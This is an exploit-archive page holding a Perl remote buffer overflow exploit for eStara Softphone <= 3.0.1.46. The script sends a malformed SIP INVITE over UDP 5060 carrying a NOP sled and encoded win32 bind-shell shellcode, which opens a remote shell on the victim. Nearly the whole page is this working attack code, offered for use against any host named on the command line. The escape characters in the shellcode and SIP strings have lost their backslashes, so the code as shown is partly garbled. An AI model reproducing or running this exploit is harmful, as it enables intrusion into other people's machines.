eStara Softphone <= 3.0.1.46 (SIP) Remote Buffer Overflow Exploit (2)

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : eStara Softphone <= 3.0.1.46 (SIP) Remote Buffer Overflow Exploit (2)
# Published : 2006-01-12
# Author : kokanin
# Previous Title : eStara Softphone <= 3.0.1.46 (SIP) Remote Buffer Overflow Exploit
# Next Title : Windows XP/2003 Metafile Escape() Code Execution Exploit (meta)

#!/usr/bin/perl -s
# damn-hippie.pl by kokanin (google estara, it shows sip stuff and a hippie)
# Remote "estara softphone" exploit, executable version info = 3.0.1.2
# kokanin did the research, metasploit.com did the encoded bindshell on tcp/5060
# Lets face it, most users wont know the difference between tcp and udp even if 
# if it bites them in the ass, so the port is chosen in the hope that nat'ed
# users forward both tcp and udp port 5060 to their machine to make sip stuff
# work without all that hard thinking taking place.

# this used to be 0day, but I saw someone release something called estara.c
# on packetstorm today. I don't know if it's even the same bug, but this
# exploit is better anyway, so there.

# win32_bind, x00x0ax0d encoded, [ EXITFUNC=thread LPORT=5060 Size=399 ] 
# again, provided by http://metasploit.com (facing more stuff, I wouldn't know
# how to write win32 shellcode even if someone bit me in the ass :)
# since the shellcode exits the thread the user should not notice anything.

use IO::Socket;
if(!$ARGV[0])
{ print "I am private, do not use me. Tell kokanin how you got men"; exit(-1); }
my $ret = pack("l",0x0303DCDF); # jmp di in softphone.exe, seems stable
my $buflen = 4099;

my $shellcode =
"xd9xeexd9x74x24xf4x5bx31xc9xb1x5ex81x73x17x08xb3".
"x06x82x83xebxfcxe2xf4xf4x5bx50x82x08xb3x55xd7x5e".
"xe4x8dxeex2cxabx8dxc7x34x38x52x87x70xb2xecx09x42".
"xabx8dxd8x28xb2xedx61x3axfax8dxb6x83xb2xe8xb3xf7".
"x4fx37x42xa4x8bxe6xf6x0fx72xc9x8fx09x74xedx70x33".
"xcfx22x96x7dx52x8dxd8x2cxb2xedxe4x83xbfx4dx09x52".
"xafx07x69x83xb7x8dx83xe0x58x04xb3xc8xecx58xdfx53".
"x71x0ex82x56xd9x36xdbx6cx38x1fx09x53xbfx8dxd9x14".
"x38x1dx09x53xbbx55xeax86xfdx08x6exf7x65x8fx45x89".
"x5fx06x83x08xb3x51xd4x5bx3axe3x6ax2fxb3x06x82x98".
"xb2x06x82xbexaax1ex65xacxaax76x6bxedxfax80xcbxac".
"xa9x76x45xacx1ex28x6bxd1xbaxf3x2fxc3x5exfaxb9x5f".
"xe0x34xddx3bx81x06xd9x85xf8x26xd3xf7x64x8fx5dx81".
"x70x8bxf7x1cxd9x01xdbx59xe0xf9xb6x87x4cx53x86x51".
"x3ax02x0cxeax41x2dxa5x5cx4cx31x7dx5dx83x37x42x58".
"xe3x56xd2x48xe3x46xd2xf7xe6x2ax0bxcfx82xddxd1x5b".
"xdbx04x82x1bx77x8fx62x62xa3x56xd5xf7xe6x22xd1x5f".
"x4cx53xaax5bxe7x51x7dx5dx93x8fx45x60xf0x4bxc6x08".
"x3axe5x05xf2x82xc6x0fx74x97xaaxe8x1dxeaxf5x29x8f".
"x49x85x6ex5cx75x42xa6x18xf7x60x45x4cx97x3ax83x09".
"x3ax7axa6x40x3ax7axa6x44x3ax7axa6x58x3ex42xa6x18".
"xe7x56xd3x59xe2x47xd3x41xe2x57xd1x59x4cx73x82x60".
"xc1xf8x31x1ex4cx53x86xf7x63x8fx64xf7xc6x06xeaxa5".
"x6ax03x4cxf7xe6x02x0bxcbxd9xf9x7dx3ex4cxd5x7dx7d".
"xb3x6ex6dxc6x53x66x7dx5dxb7x37x59x5bx4cxd6x82";

my $buffer = "x90" x ($buflen - length($shellcode)) . $shellcode;

my $sipinvite = 

"INVITE sip:snotboble@solgryn.fi.st SIP/2.0rn".
"Via: SIP/2.0/UDP abcdabcd.fi.st:1234;branch=somebranchidherern".
"From: 2448 <sip:kagemand@abcdabcd.fi.st>;tag=2448rn".
"To: Receiver <sip:snotboble@solgryn.fi.st>rn".
"Call-ID: 0@abcdabcd.fi.strn".
"CSeq: 1 INVITErn".
"Contact: 2448 <sip:kagemand@abcdabcd.fi.st>rn".
"Expires: 1200rn".
"Max-Forwards: 70rn".
"Content-Type: application/sdprn".
"Content-Length: 4234rn".
"rn".
$buffer . 
"=0rn".
"o=2448 2448 2448 IN IP4 " . $ret . "DCBA.fi.strn".
"s=Session SDPrn".
"c=IN IP4 123.123.12.34rn".
"t=0 0rn".
"m=audio 9876 RTP/AVP 0rn".
"a=rtpmap:0 PCMU/8000rn".
"rn";
$host = $ARGV[0];
$port = 5060;

$socket = new IO::Socket::INET
(
Proto    => "udp",
PeerAddr => $host,
PeerPort => $port,
);

die "unable to connect to $host:$port ($!)n" unless $socket;

print $socket $sipinvite; 

close($socket);

# www.Syue.com [2006-01-12]